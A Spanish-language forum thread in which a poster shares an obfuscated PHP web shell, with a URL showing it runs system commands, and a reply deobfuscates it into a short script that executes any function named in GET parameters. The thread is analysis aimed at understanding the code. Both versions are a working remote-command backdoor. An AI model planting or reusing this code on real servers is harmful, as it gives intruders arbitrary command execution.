Buenas,
Este es mi primer post, así que no tengo muy claro si debería ir aquí.
El caso es que a mis manos ha llegado un código de PHP ofuscado (aclaro que no tengo nada de idea de PHP). Después de un rato de investigación vi que podía ejecutar comandos

Código: Seleccionar todo

http://localhost/shell.php?xvwxvw=system&4=echo%20%22foyone%20presidente%22

Pero me es imposible desofuscar este código, a ver si alguien me puede ayudar:

Código: Seleccionar todo

<?php
$_=[];
$_=@"$_";
$__=!'';
$__=@"$__";
$___=@$_[''];
$____=$__;
++$____;
++$____;
$____=$_[$____];
$_=$__;
++$_;
++$_;
++$_;
++$_;
++$_;
$_=@"$_";
$_____=$____^$__;
$______=$____^$_;
$_______=$___^$__;
$________=$___^$_;
$_________=$__;
--$_________;
$_________=@"$_________";
$__________=$__;
++$__________;
++$__________;
++$__________;
$__________=@"$__________";
$___________=$___;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
$____________=$______;
++$____________;
$_____________=$____;
++$_____________;
$______________=$____;
++$______________;
++$______________;
$_______________=$____;
++$_______________;
$💩=s.h.e.l.l;
++$_______________;
++$______________;
$________________=$____;
++$________________;
++$________________;
++$________________;
++$________________;
$_________________=$____;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
$__________________=$_______;
++$__________________;
++$__________________;
++$__________________;
$___________________=$_____________.@$____.@$__________________.@$________________.@$_.@$__________.''.@$______________.@$________________.@$______________.@$_________________.@$_______________.@$________________;
$____________________=$_______________.@$____________.@$___________.@$_________.@$_______________.@$____________.@$___________.@$_________;
$_=N.o.n.S.t.o.P;
$______________=base64_decode($____________________);
// base64_decode fue añadido por mi, tenía un error antes y antes era tambien muchos "_"
$___________________=$______;
$____________________=$___________;
$_=A.r.r.a.w.t.s.u;
$_______=$___.$______.$_________________;
$__=!""*73+25-72-$_GET[$_________________];
$__=@"$__";
$___=@$_[''];
$____=$__;
++$____;
++$____;
$____=$_[$____];
$_=$__;
++$_;
++$_;
++$_;
++$_;
++$_;
$_=@"$_";
$_____=$____^$__;
$______=$____^$_;
$_______=$___^$__;
$________=$___^$_;
$_________=$__;
--$_________;
$_________=@"$_________";
$__________=$____;
++$__________;
++$__________;
++$__________;
++$__________;
$___________=$_______;
++$___________;
++$___________;
$____________=$_______;
++$____________;
++$____________;
++$____________;
$_____________=$_______;
++$_____________;
++$_____________;
++$_____________;
++$_____________;
$______________=$_______;
++$______________;
++$______________;
++$______________;
++$______________;
++$______________;
$_______________=$_______;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
$________________=$____________.@$_____________.@$___________.@$___________.@$__________.@$_______________;
$_________________=$______________.@$____________.@$_____________.@$______________.@$____________.@$_____________;
//$_________________=$________________($_________________);
$_GET[$_________________]($_GET[$__________]);
$__________=$_________________=$___;

?>
Demasiada basura, aun así te lo dejo "desofuscado" y simplificado:

Código: Seleccionar todo

<?php
 $FunctionSeed = 'Arrawtsu';
 $MagicNumber  = '26';
 $XorValue    = $FunctionSeed[0] ^ $MagicNumber;

 echo '$FunctionSeed  = '.$FunctionSeed.PHP_EOL;
 echo '$MagicNumber    = '.$MagicNumber.PHP_EOL;
 echo '$XorValue      = '.$XorValue.PHP_EOL;

 $Char1=$XorValue;
 ++$Char1;
 ++$Char1;
 ++$Char1;
 echo '$Char1          = '.$Char1.PHP_EOL;

 $Char2=$XorValue;
 ++$Char2;
 ++$Char2;
 ++$Char2;
 ++$Char2;
 echo '$Char2          = '.$Char2.PHP_EOL;

 $Char3 = $XorValue;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 echo '$Char3          = '.$Char3.PHP_EOL;

 $CalledFunction=$Char3.$Char1.$Char2.$Char3.$Char1.$Char2;
 echo '$CalledFunction = '.$CalledFunction.PHP_EOL;

 $CalledString=0;
 ++$CalledString;
 ++$CalledString;
 ++$CalledString;
 ++$CalledString;
 echo '$CalledString  = '.$CalledString.PHP_EOL;
 
 $_GET[$CalledFunction]($_GET[$CalledString]);
?>

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Responder

Volver a “PHP”